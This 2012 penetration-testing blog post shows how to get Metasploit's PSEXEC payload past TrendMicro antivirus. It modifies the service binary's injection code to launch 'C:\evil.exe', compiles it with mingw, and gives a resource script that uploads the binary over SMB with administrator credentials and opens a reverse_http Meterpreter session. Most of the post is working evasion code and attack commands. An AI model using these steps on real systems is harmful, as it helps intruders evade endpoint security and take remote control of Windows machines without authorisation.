Bypassing TrendMicro's Service Protections

Monday, August 20, 2012

Rob Fuller


@jabjorkhaug posed the following question on Twitter recently:

Screen Shot 2012 07 04 at 3 55 08 PM

I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:

Screen Shot 2012 07 04 at 4 03 14 PM

The service binary that is used as part of PSEXEC is located here:

MSF Directory/data/templates/src/pe/exe/service/service.c

The important part to look at starts at line 57:

if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )


Context.ContextFlags = CONTEXT_FULL;

GetThreadContext( pi.hThread, &Context );


if( lpPayload )


WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );

#ifdef _WIN64

Context.Rip = (DWORD64)lpPayload;


Context.Eip = (DWORD)lpPayload;


SetThreadContext( pi.hThread, &Context );


ResumeThread( pi.hThread );

CloseHandle( pi.hThread );

CloseHandle( pi.hProcess );


It's injecting our payload into the service binary and tossing our payload into "rundll32.exe" at run time on the victim (side note: you can change which bin it goes into ;).

Lets change this so it doesn't do any injection and just executes a binary. That removes the 'injection' piece and hopefully lets us get our shell. We are loosing a bit of stealth because instead of just one (the service binary) we are writing two binaries.

To make this change you replace the above with just this:

if( CreateProcess( NULL, "C:\\evil.exe", NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi ) )


CloseHandle( pi.hProcess );


Compiling this on OSX using mingw is very easy and is very similar on Ubuntu if you have mingw installed:

i386-mingw32-gcc -o service.exe service.c 

Then just copy it to replace the current one:

cp service.exe ../../../../template_x86_windows_svc.exe 

No other changes are needed. Only problem is, how do we get the "evil.exe" up onto the box for it to execute?

That's where the auxiliary module "auxiliary/admin/smb/upload_file" comes in :-) I built a resource file to demo the timeline of getting execution with this new service binary (broken up with comments to explain, _remove the comments for it to work_):

#Start Multi Handler

use multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LPORT 80
set ExitOnSession false
exploit -j -z

#Upload file to evil.exe on the C$ share (C$ is default for this module so no reason to set it)

use auxiliary/admin/smb/upload_file
set LPATH evil.exe
set RPATH evil.exe
set SMBUser Administrator
set SMBPass Password1234!

#Execute PSEXEC using the new service binary that simply executes

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass Password1234!
set DisablePayloadHandler true
set PAYLOAD windows/meterpreter/reverse_http
set LPORT 80
exploit -j -z

The passwords could have just as easily been hashes, and the end result is:

Well I can't really show you that nothing was detected… so I guess you just have to believe me when I say:

[*] Meterpreter session 2 opened ( -> at Wed Jul 04 16:02:23 -0400 2012


Cross-posted from Room362

Possibly Related Articles:
Information Security
Hacking Tools Penetration Testing Network Security Meterpreter Payloads Pentesting Tutorial TrendMicro
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.